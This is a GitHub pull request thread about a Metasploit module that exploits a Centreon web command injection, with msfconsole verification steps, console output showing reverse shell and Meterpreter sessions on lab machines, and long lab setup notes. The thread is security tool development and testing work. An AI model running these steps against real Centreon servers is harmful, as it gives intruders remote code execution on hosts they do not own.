centreon useralias exec

[h00die]

Adds exploit for Centreon web command injection as documented in EDB 39501

This application had many steps to get installed and working. Please see the doc, as it will assist with links to get your environment installed. I think it took me a little over an hour to install all the components and get the website to load.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• Do: use exploit/linux/http/centreon_useralias_exec
• Do: set payload
• Do: set rhost
• Do: set verbose true
• Do: check

  [+] Version Detected: 2.5.3
  [*] 192.168.2.85:80 The target appears to be vulnerable.

• Do: exploit
• Verify the thing does what it should

  [*] Started reverse TCP handler on 192.168.2.229:4444 
  [*] Sending malicious login
  [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
  whoami
  www-data
  uname -a
  Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

[nixawk]

The Name field should begin with the name of the vendor, followed by the software. Ideally the "Root Cause" field means which component or function the bug is found. And finally, the type of vulnerability the module is exploiting.

[wvu]

And no version either. Leave that to the description or a version field (if we ever get around to it). In general, Name should mimic the module name (or vice versa).

[wvu]

We have #6976 merged in now. It was an example for pull request training. :)

[wvu]

#6934 (comment)

[h00die]

@bwatters-r7 I know how much you love setting up difficult/multi-step software packages. this one screams your name!

[h00die]

@wvu-r7 @wchen-r7 anyone want to build a VM and try this? Don't want it to fall too far behind. Software install is ~30min (building the deps to get the website installed)

[bwatters-r7]

I'll hit this when I get back Thursday, unless someone else wants it.

On Jun 21, 2016 19:26, h00die notifications@github.com wrote:

@wvu-r7https://github.com/wvu-r7 @wchen-r7https://github.com/wchen-r7 anyone want to build a VM and try this? Don't want it to fall too far behind. Software install is ~30min (building the deps to get the website installed)

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHubhttps://github.com//pull/6965#issuecomment-227610946, or mute the threadhttps://github.com/notifications/unsubscribe/ARJ1yg8VU4sD8YVUIdvMKGjO_y5otf5Uks5qOIEfgaJpZM4IzrPK.

[wvu]

I tried for a couple minutes and then gave up.

[bwatters-r7]

Abandon hope ye who enter here.

So I spent several hours trying to get a test platform working, and it is extremely unpleasant and the documentation I saw on exploit-db is not really helpful, nor are the conflicting setup documents online, mostly for very old versions of Centreon. The process is pretty long and any one of the settings that you change could break the application and/or the vulnerability. Personally, I gave up on creating the test platform and I'm about to go drink a beer, but if anyone else would like to try, here are the steps I followed in my attempt. I had hoped to find a clear, concise set-up document, but I could not. I tried to make one here, but I gave up. If anyone has such a document, please post it. I think I got close, but got a seg fault when trying to start ndo2db, one of many dependencies. All that being said, I'm not a CentOS/Redhat guy, nor am I familiar with any of the dependency binaries that must be configured for Centreon to work. It is entirely possible that I took a left turn somewhere and the fix is easy.

What I learned I needed to do before even trying to install Centreon:

• Install CentOS 6.8
• su -c 'yum update'
• su -c 'yum install rrdtool'
• su -c 'yum install php'
• su -c 'yum install php-pear'
• su -c mkdir /var/log/centreon
• try and install nagios and hate the world
• su -c 'yum install epel-release'
• su -c 'yum install nagios'
• su -c 'yum install nagios-plugins-all'
• Install and configure NDOUtils for Centos (copied from http://joesteinkamp.com/setting-up-ndoutils-for-nagios-on-centos/)

First things, elevate yourself to root.

su root
1. Install GCC and update MySQL

yum install gcc
yum update mysql
yum install mysql-server
yum install mysql-devel
2. Start mysql & Add mysql as Startup service

/etc/init.d/mysqld start
chkconfig --add mysqld
3. Create MySQL Database

mysql
create database nagios;
GRANT ALL ON nagios.* TO nagios@localhost IDENTIFIED BY "nagios";
FLUSH PRIVILEGES;
quit
4. Download and untar the latest release of NDOutils - http://sourceforge.net/projects/nagios/files/ndoutils-1.x/
5. Copy to /tmp/
6. Change directory to /tmp/

cd /tmp/
tar zxfv ndoutils-1.4b9.tar.gz
7. Compile NDOutils

cd /ndoutils-1.4b9/
./configure
make
8. Make /var/run/nagios folder & Change the ownership to nagios user

mkdir /var/run/nagios
chown nagios:nagios /var/run/nagios
chmod 755 /var/run/nagios
9. Copy appropriate ndo2db.o & ndomod.o /usr/bin and set permissions
"ndo2db-2x.o" & "ndomod-2x.o" for Nagios 2.x
"ndo2db-3x.o" & "ndomod-3x.o" for Nagios 3.x

cp /tmp/ndoutils-1.4b9/src/ndo2db-3x.o /usr/bin/ndo2db
cp /tmp/ndoutils-1.4b9/src/ndomod-3x.o /usr/bin/ndomod
chmod 755 /usr/bin/ndo2db
chmod 755 /usr/bin/ndomod
10. Create NDO database

cd /tmp/ndoutils-1.4b9/src/db

EDIT..... installdb is actually in /tmp/ndoutils-2.0.0/db

./installdb -u nagios -p nagios -h localhost -d nagios
11. Copy configuration files

cp /tmp/ndoutils-1.4b9/config/ndo2db.cfg /etc/nagios
cp /tmp/ndoutils-1.4b9/config/ndomod.cfg /etc/nagios
12. Modify /etc/nagios/ndo2b.cfg

nano /etc/nagios/ndo2db.cfg
Set lock_file=/var/run/nagios/ndo2db.lock
Set ndo2dbuser=nagio and ndo2dbgroup=nagios
Set socket_name=/var/run/nagios/ndo.sock
Set db_host=localhost , db_name=nagios , db_prefix=nagios_ , dp_user=nagios , dp_pass=nagios
Set debug_file=/var/run/nagios/ndo2db.debug
Set time intervals to store data
13. Modify /etc/nagios/ndomod.cfg

nano /etc/nagios/ndomod.cfg
Set output=/var/run/nagios/ndo.sock
Set buffer_file=/var/run/nagios/ndomod.tmp
14. Modify /etc/nagios/nagios.cfg

Add the follow line: broker_module=/usr/bin/ndomod config_file=/etc/nagios/ndomod.cfg
15. Change ownership and permissions on config files

chown nagios:nagios /etc/nagios/ndo2db.cfg
chown nagios:nagios /etc/nagios/ndomod.cfg
chmod 664 /etc/nagios/ndo2db.cfg
chmod 664 /etc/nagios/ndomod.cfg
16. Start NDO2DB

/usr/bin/ndo2db -c /etc/nagios/ndo2db.cfg

At this point, I got a seg fault. Walking away for now.

17. Restart Nagios

/etc/init.d/nagios restart

Notes during the actual attempted installation of Centreon:

• Change location of PEAR.php to /usr/share/pear/PEAR.php
• Change the nagios plugins directory to /usr/libexec
• Rethink the life choices that brought you to this point
• Change Monitoring Engine init.d script to /etc/init.d/nagios
• Change Monitoring Engine Binary to /usr/sbin/nagios
• Change Monitoring Configuration directory to /etc/nagios
• Change configuration directory for broker module to /etc/nagios

[h00die]

I will note that if you are in the Web site install portion, not just the command line install, there were like 2 folders or so that I didn't have and was like...... so I just gave it folders that existed. It got me through the install, I'm sure the app itself would be borked, but all you need is the Web login so whatever.
So if you made it to that point, and it seems like it, just flub the folders to get through it.
"Try harder" -muts

[h00die]

@bwatters-r7 pending I get some time tomorrow, i'll rebuild my VM from scratch and take copious notes so you can give this a second try w/ hopefully a better outcome!

[h00die]

@bwatters-r7 ok, I have now redone the instructions, from scratch. From the web install, you'll notice i flub many of the folders. Since we don't need anything to work except the login, its unimportant. This took me a little over an hour to do. 1 more chance?

[bwatters-r7]

Sweet, @h00die ! I was off-grid last week, but I'll revisit this week.
Thanks

[bwatters-r7]

Test Run

msf > use exploit/linux/http/centreon_useralias_exec 
msf exploit(centreon_useralias_exec) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(centreon_useralias_exec) > set rhost <target_IP>
rhost => <target_IP>
msf exploit(centreon_useralias_exec) > set lhost <msf_IP>
lhost => <msf_IP>
msf exploit(centreon_useralias_exec) > run

[*] Started reverse TCP handler on <msf_IP>:4444 
[*] Sending stage (38474 bytes) to <target_IP>
[*] Meterpreter session 1 opened (<msf_IP>:4444 -> <target_IP>:38480) at 2016-07-26 14:16:58 -0700

meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016
Architecture : x86_64
Meterpreter  : python/python
meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP LOOPBACK RUNNING
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : ens33
Hardware MAC : 00:0c:29:ab:c0:a1
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST
IPv4 Address : <target_IP>
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::7499:a233:61aa:bfcc
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > 

[bwatters-r7]

Release Notes

Centreon is a free network monitoring software suite, and this module takes advantage of security holes in how Centreon's web portal logs database errors to execute arbitrary code on the remote host.

[bwatters-r7]

@h00die Thanks for the extra guidance; I ran into some other snags, but that was exactly what I needed to get me close enough!
I did add a bit to the documentation without sending you a PR. It was a small change for an issue I ran into. I assumed that you'd be OK with the change, and I wanted to push this up and close the PR.
Great work!

[h00die]

no problem at all!